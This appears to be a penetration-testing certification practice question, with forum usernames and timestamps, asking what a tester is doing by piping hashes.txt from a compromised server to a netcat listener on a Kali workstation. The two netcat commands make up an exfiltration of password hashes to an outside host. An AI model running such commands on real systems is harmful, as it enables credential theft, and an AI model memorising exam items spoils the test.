A penetration tester gets a shell on a server and runs the following command:
nc kaliworkstation 4444 < hashes.txt
The penetration tester runs the following command on a Kali workstation:
nc -nlvp 4444 > hashes.txt
Which of the following best describes what the penetration tester is attempting to do?
Ta2oo
7 months, 3 weeks agoNappyGamer
7 months, 3 weeks ago